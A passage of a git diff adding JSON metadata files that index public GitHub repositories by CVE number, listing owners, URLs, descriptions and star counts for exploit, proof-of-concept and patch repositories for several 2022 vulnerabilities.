"forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573162752, + "name": "CVE-2022-41082", + "full_name": "sikkertech\/CVE-2022-41082", + "owner": { + "login": "sikkertech", + "id": 74667436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74667436?v=4", + "html_url": "https:\/\/github.com\/sikkertech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sikkertech\/CVE-2022-41082", + "description": "Exchange CVE '22", + "fork": false, + "created_at": "2022-12-01T20:48:53Z", + "updated_at": "2023-11-05T16:40:22Z", + "pushed_at": "2022-12-01T20:50:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 581104837, + "name": "OWASSRF-CVE-2022-41082-POC", + "full_name": "balki97\/OWASSRF-CVE-2022-41082-POC", + "owner": { + "login": "balki97", + "id": 37090035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37090035?v=4", + "html_url": "https:\/\/github.com\/balki97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/balki97\/OWASSRF-CVE-2022-41082-POC", + "description": "PoC for the CVE-2022-41080 , CVE-2022-41082 and CVE-2022-41076 Vulnerabilities Affecting Microsoft Exchange Servers", + "fork": false, + "created_at": "2022-12-22T09:35:26Z", + "updated_at": "2024-10-02T04:18:20Z", + "pushed_at": "2023-01-10T08:09:36Z", + "stargazers_count": 91, + "watchers_count": 91, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-41076", + "cve-2022-41080", + "cve-2022-41082", + "exchange-server", + "exploit", + "microsoft", + "vulnerability" + ], + "visibility": "public", + "forks": 33, + "watchers": 91, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604424331, + "name": "CVE-2022-41082-POC", + "full_name": "bigherocenter\/CVE-2022-41082-POC", + "owner": { + "login": "bigherocenter", + "id": 117562871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117562871?v=4", + "html_url": "https:\/\/github.com\/bigherocenter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigherocenter\/CVE-2022-41082-POC", + "description": null, + "fork": false, + "created_at": "2023-02-21T02:59:46Z", + "updated_at": "2023-02-21T03:00:00Z", + "pushed_at": "2023-02-21T02:59:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617641356, + "name": "vuln-CVE-2022-41082", + "full_name": "notareaperbutDR34P3r\/vuln-CVE-2022-41082", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/vuln-CVE-2022-41082", + "description": "https & http", + "fork": false, + "created_at": "2023-03-22T20:04:07Z", + "updated_at": "2023-03-22T20:11:03Z", + "pushed_at": "2023-03-22T20:10:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686757637, + "name": "CVE-2022-41082", + "full_name": "SUPRAAA-1337\/CVE-2022-41082", + "owner": { + "login": "SUPRAAA-1337", + "id": 128395905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4", + "html_url": "https:\/\/github.com\/SUPRAAA-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2022-41082", + "description": null, + "fork": false, + "created_at": "2023-09-03T20:55:20Z", + "updated_at": "2024-03-18T17:53:10Z", + "pushed_at": "2023-09-03T21:02:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877906940, + "name": "CVE-2022-41082", + "full_name": "soltanali0\/CVE-2022-41082", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2022-41082", + "description": "CVE-2022-41082-poc", + "fork": false, + "created_at": "2024-10-24T12:56:52Z", + "updated_at": "2024-10-24T15:39:08Z", + "pushed_at": "2024-10-24T15:39:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41099.json b/2022/CVE-2022-41099.json new file mode 100644 index 0000000000..9f76c8fca1 --- /dev/null +++ b/2022/CVE-2022-41099.json @@ -0,0 +1,157 @@ +[ + { + "id": 588734636, + "name": "UpdateWindowsRE-CVE-2022-41099", + "full_name": "halsey51013\/UpdateWindowsRE-CVE-2022-41099", + "owner": { + "login": "halsey51013", + "id": 30665665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30665665?v=4", + "html_url": "https:\/\/github.com\/halsey51013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halsey51013\/UpdateWindowsRE-CVE-2022-41099", + "description": "Script to update Windows Recovery Environment to patch against CVE-2022-41099", + "fork": false, + "created_at": "2023-01-13T21:27:03Z", + "updated_at": "2023-03-28T22:30:38Z", + "pushed_at": "2023-01-20T10:31:58Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 589494963, + "name": "CVE-2022-41099-Fix", + "full_name": "o0MattE0o\/CVE-2022-41099-Fix", + "owner": { + "login": "o0MattE0o", + "id": 80461805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80461805?v=4", + "html_url": "https:\/\/github.com\/o0MattE0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/o0MattE0o\/CVE-2022-41099-Fix", + "description": "Update WINRE.WIM file to fix CVE-2022-41099", + "fork": false, + "created_at": "2023-01-16T08:57:29Z", + "updated_at": "2024-06-04T11:02:47Z", + "pushed_at": "2023-04-25T09:47:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595717372, + "name": "WinRE-Patch", + "full_name": "g-gill24\/WinRE-Patch", + "owner": { + "login": "g-gill24", + "id": 18432629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18432629?v=4", + "html_url": "https:\/\/github.com\/g-gill24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-gill24\/WinRE-Patch", + "description": "Patches CVE-2022-41099", + "fork": false, + "created_at": "2023-01-31T17:06:13Z", + "updated_at": "2023-01-31T17:07:16Z", + "pushed_at": "2023-01-31T17:07:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627897478, + "name": "KB5025175-CVE-2022-41099", + "full_name": "dsn1321\/KB5025175-CVE-2022-41099", + "owner": { + "login": "dsn1321", + "id": 37174087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37174087?v=4", + "html_url": "https:\/\/github.com\/dsn1321", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dsn1321\/KB5025175-CVE-2022-41099", + "description": null, + "fork": false, + "created_at": "2023-04-14T12:48:39Z", + "updated_at": "2023-04-14T12:49:26Z", + "pushed_at": "2023-04-14T14:26:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885313431, + "name": "PatchWinRE", + "full_name": "rhett-hislop\/PatchWinRE", + "owner": { + "login": "rhett-hislop", + "id": 48539263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48539263?v=4", + "html_url": "https:\/\/github.com\/rhett-hislop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhett-hislop\/PatchWinRE", + "description": "Automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2022-41099.", + "fork": false, + "created_at": "2024-11-08T10:50:26Z", + "updated_at": "2024-11-08T10:53:43Z", + "pushed_at": "2024-11-08T10:53:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41114.json b/2022/CVE-2022-41114.json new file mode 100644 index 0000000000..2299ced441 --- /dev/null +++ b/2022/CVE-2022-41114.json @@ -0,0 +1,33 @@ +[ + { + "id": 584184679, + "name": "CVE-2022-41114", + "full_name": "gmh5225\/CVE-2022-41114", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-41114", + "description": "Windows Bind Filter Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-01T18:30:30Z", + "updated_at": "2023-02-20T12:35:54Z", + "pushed_at": "2022-12-28T09:34:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41218.json b/2022/CVE-2022-41218.json new file mode 100644 index 0000000000..5576d29460 --- /dev/null +++ b/2022/CVE-2022-41218.json @@ -0,0 +1,33 @@ +[ + { + "id": 544746835, + "name": "CVE-2022-41218", + "full_name": "Tobey123\/CVE-2022-41218", + "owner": { + "login": "Tobey123", + "id": 5292815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5292815?v=4", + "html_url": "https:\/\/github.com\/Tobey123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tobey123\/CVE-2022-41218", + "description": "Vulnerability Details for CVE-2022-41218", + "fork": false, + "created_at": "2022-10-03T06:38:46Z", + "updated_at": "2022-09-30T16:44:36Z", + "pushed_at": "2022-10-01T12:01:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41220.json b/2022/CVE-2022-41220.json new file mode 100644 index 0000000000..3e4ae9e3a9 --- /dev/null +++ b/2022/CVE-2022-41220.json @@ -0,0 +1,33 @@ +[ + { + "id": 595840391, + "name": "CVE-2022-41220", + "full_name": "Halcy0nic\/CVE-2022-41220", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-41220", + "description": "Proof of concept for CVE-2022-41220", + "fork": false, + "created_at": "2023-01-31T23:05:31Z", + "updated_at": "2024-07-02T20:33:18Z", + "pushed_at": "2023-07-27T23:01:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41272.json b/2022/CVE-2022-41272.json new file mode 100644 index 0000000000..032c4ec30c --- /dev/null +++ b/2022/CVE-2022-41272.json @@ -0,0 +1,33 @@ +[ + { + "id": 577881083, + "name": "CVE-2022-41272", + "full_name": "redrays-io\/CVE-2022-41272", + "owner": { + "login": "redrays-io", + "id": 89958617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4", + "html_url": "https:\/\/github.com\/redrays-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redrays-io\/CVE-2022-41272", + "description": "Improper access control in SAP NetWeaver Process Integration", + "fork": false, + "created_at": "2022-12-13T18:32:03Z", + "updated_at": "2023-01-12T06:55:56Z", + "pushed_at": "2022-12-13T18:38:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41333.json b/2022/CVE-2022-41333.json new file mode 100644 index 0000000000..475e8bd452 --- /dev/null +++ b/2022/CVE-2022-41333.json @@ -0,0 +1,33 @@ +[ + { + "id": 612324416, + "name": "CVE-2022-41333", + "full_name": "polar0x\/CVE-2022-41333", + "owner": { + "login": "polar0x", + "id": 115294515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115294515?v=4", + "html_url": "https:\/\/github.com\/polar0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polar0x\/CVE-2022-41333", + "description": "FortiRecorder Denial of Service Exploit (CVE-2022-41333)", + "fork": false, + "created_at": "2023-03-10T17:29:09Z", + "updated_at": "2023-09-11T16:07:58Z", + "pushed_at": "2023-03-14T15:41:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41343.json b/2022/CVE-2022-41343.json new file mode 100644 index 0000000000..b204c8d2d3 --- /dev/null +++ b/2022/CVE-2022-41343.json @@ -0,0 +1,38 @@ +[ + { + "id": 602302259, + "name": "CVE-2022-41343", + "full_name": "BKreisel\/CVE-2022-41343", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-41343", + "description": "🐍 Python Exploit for CVE-2022-23935", + "fork": false, + "created_at": "2023-02-15T23:17:55Z", + "updated_at": "2024-01-17T19:11:33Z", + "pushed_at": "2023-02-17T18:37:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-41343", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41352.json b/2022/CVE-2022-41352.json new file mode 100644 index 0000000000..46efdfe8f8 --- /dev/null +++ b/2022/CVE-2022-41352.json @@ -0,0 +1,102 @@ +[ + { + "id": 548959911, + "name": "cve-2022-41352", + "full_name": "segfault-it\/cve-2022-41352", + "owner": { + "login": "segfault-it", + "id": 24494334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24494334?v=4", + "html_url": "https:\/\/github.com\/segfault-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/segfault-it\/cve-2022-41352", + "description": "cve-2022-41352 poc", + "fork": false, + "created_at": "2022-10-10T13:04:34Z", + "updated_at": "2023-12-05T00:38:46Z", + "pushed_at": "2022-10-10T13:12:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564929230, + "name": "cve-2022-41352-zimbra-rce", + "full_name": "Cr4ckC4t\/cve-2022-41352-zimbra-rce", + "owner": { + "login": "Cr4ckC4t", + "id": 63863112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63863112?v=4", + "html_url": "https:\/\/github.com\/Cr4ckC4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cr4ckC4t\/cve-2022-41352-zimbra-rce", + "description": "Zimbra <9.0.0.p27 RCE", + "fork": false, + "created_at": "2022-11-11T20:58:08Z", + "updated_at": "2024-08-26T13:16:59Z", + "pushed_at": "2022-11-24T14:59:35Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpio", + "cve", + "cve-2022-41352", + "python3", + "rce", + "zimbra" + ], + "visibility": "public", + "forks": 27, + "watchers": 100, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 729969528, + "name": "cve-2022-41352-zimbra-rce", + "full_name": "qailanet\/cve-2022-41352-zimbra-rce", + "owner": { + "login": "qailanet", + "id": 128580194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128580194?v=4", + "html_url": "https:\/\/github.com\/qailanet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qailanet\/cve-2022-41352-zimbra-rce", + "description": null, + "fork": false, + "created_at": "2023-12-10T22:29:21Z", + "updated_at": "2023-12-10T23:02:12Z", + "pushed_at": "2023-12-10T23:02:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41358.json b/2022/CVE-2022-41358.json new file mode 100644 index 0000000000..e5410abd2d --- /dev/null +++ b/2022/CVE-2022-41358.json @@ -0,0 +1,33 @@ +[ + { + "id": 552034284, + "name": "CVE-2022-41358", + "full_name": "thecasual\/CVE-2022-41358", + "owner": { + "login": "thecasual", + "id": 29391916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29391916?v=4", + "html_url": "https:\/\/github.com\/thecasual", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thecasual\/CVE-2022-41358", + "description": null, + "fork": false, + "created_at": "2022-10-15T17:06:00Z", + "updated_at": "2022-10-15T17:06:00Z", + "pushed_at": "2022-10-15T17:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41401.json b/2022/CVE-2022-41401.json new file mode 100644 index 0000000000..ee4158788c --- /dev/null +++ b/2022/CVE-2022-41401.json @@ -0,0 +1,33 @@ +[ + { + "id": 673039429, + "name": "CVE-2022-41401", + "full_name": "ixSly\/CVE-2022-41401", + "owner": { + "login": "ixSly", + "id": 32583633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32583633?v=4", + "html_url": "https:\/\/github.com\/ixSly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixSly\/CVE-2022-41401", + "description": null, + "fork": false, + "created_at": "2023-07-31T18:20:35Z", + "updated_at": "2024-06-11T14:40:32Z", + "pushed_at": "2023-07-31T18:25:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41412.json b/2022/CVE-2022-41412.json new file mode 100644 index 0000000000..66bcd4854a --- /dev/null +++ b/2022/CVE-2022-41412.json @@ -0,0 +1,33 @@ +[ + { + "id": 571851858, + "name": "CVE-2022-41412", + "full_name": "renmizo\/CVE-2022-41412", + "owner": { + "login": "renmizo", + "id": 26782725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26782725?v=4", + "html_url": "https:\/\/github.com\/renmizo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renmizo\/CVE-2022-41412", + "description": null, + "fork": false, + "created_at": "2022-11-29T02:39:08Z", + "updated_at": "2023-03-24T15:19:25Z", + "pushed_at": "2022-11-29T03:24:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41413.json b/2022/CVE-2022-41413.json new file mode 100644 index 0000000000..c108b63d63 --- /dev/null +++ b/2022/CVE-2022-41413.json @@ -0,0 +1,33 @@ +[ + { + "id": 571852635, + "name": "CVE-2022-41413", + "full_name": "renmizo\/CVE-2022-41413", + "owner": { + "login": "renmizo", + "id": 26782725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26782725?v=4", + "html_url": "https:\/\/github.com\/renmizo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renmizo\/CVE-2022-41413", + "description": null, + "fork": false, + "created_at": "2022-11-29T02:42:16Z", + "updated_at": "2022-11-29T02:52:58Z", + "pushed_at": "2022-11-29T03:32:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41445.json b/2022/CVE-2022-41445.json new file mode 100644 index 0000000000..e157bb2060 --- /dev/null +++ b/2022/CVE-2022-41445.json @@ -0,0 +1,33 @@ +[ + { + "id": 561240397, + "name": "CVE-2022-41445", + "full_name": "RashidKhanPathan\/CVE-2022-41445", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-41445", + "description": "Cross Site Scripting in Teacher's Record Management System using CodeIgnitor", + "fork": false, + "created_at": "2022-11-03T09:06:39Z", + "updated_at": "2022-11-04T00:57:10Z", + "pushed_at": "2022-11-03T09:08:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41446.json b/2022/CVE-2022-41446.json new file mode 100644 index 0000000000..e5ae7872c4 --- /dev/null +++ b/2022/CVE-2022-41446.json @@ -0,0 +1,33 @@ +[ + { + "id": 561241704, + "name": "CVE-2022-41446", + "full_name": "RashidKhanPathan\/CVE-2022-41446", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-41446", + "description": "Privilege Escalation in Teachers Record Management System using CodeIgnitor", + "fork": false, + "created_at": "2022-11-03T09:10:24Z", + "updated_at": "2022-11-04T00:57:15Z", + "pushed_at": "2022-11-03T09:11:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41540.json b/2022/CVE-2022-41540.json new file mode 100644 index 0000000000..cd47d76e1e --- /dev/null +++ b/2022/CVE-2022-41540.json @@ -0,0 +1,33 @@ +[ + { + "id": 497138927, + "name": "easy-exploits", + "full_name": "efchatz\/easy-exploits", + "owner": { + "login": "efchatz", + "id": 43434138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4", + "html_url": "https:\/\/github.com\/efchatz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efchatz\/easy-exploits", + "description": "Exploits of different CVE IDs (CVE-2021-37910, CVE-2021-40288, CVE-2021-41435, CVE-2021-41436, CVE-2021-41437, CVE-2021-41441, CVE-2021-41442, CVE-2021-41445, CVE-2021-41449, CVE-2021-41450, CVE-2021-41451, CVE-2021-41753, CVE-2021-41788, CVE-2021-46353, CVE-2022-41540, CVE-2022-41541)", + "fork": false, + "created_at": "2022-05-27T21:09:03Z", + "updated_at": "2024-09-17T07:27:43Z", + "pushed_at": "2022-10-19T21:24:35Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41544.json b/2022/CVE-2022-41544.json new file mode 100644 index 0000000000..3a277e1a3e --- /dev/null +++ b/2022/CVE-2022-41544.json @@ -0,0 +1,64 @@ +[ + { + "id": 641008000, + "name": "CVE-2022-41544", + "full_name": "yosef0x01\/CVE-2022-41544", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2022-41544", + "description": "Exploit script for CVE-2022-41544 - RCE in get-simple CMS", + "fork": false, + "created_at": "2023-05-15T15:24:55Z", + "updated_at": "2024-01-12T21:29:35Z", + "pushed_at": "2023-05-15T21:19:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836386471, + "name": "CVE-2022-41544", + "full_name": "n3rdh4x0r\/CVE-2022-41544", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2022-41544", + "description": "Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.", + "fork": false, + "created_at": "2024-07-31T18:27:53Z", + "updated_at": "2024-11-18T18:58:10Z", + "pushed_at": "2024-11-18T18:58:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41622.json b/2022/CVE-2022-41622.json new file mode 100644 index 0000000000..8036315c2a --- /dev/null +++ b/2022/CVE-2022-41622.json @@ -0,0 +1,33 @@ +[ + { + "id": 521035384, + "name": "refreshing-soap-exploit", + "full_name": "rbowes-r7\/refreshing-soap-exploit", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/refreshing-soap-exploit", + "description": "A PoC exploit for CVE-2022-41622 - a CSRF in F5 BIG-IP control plane that leads to 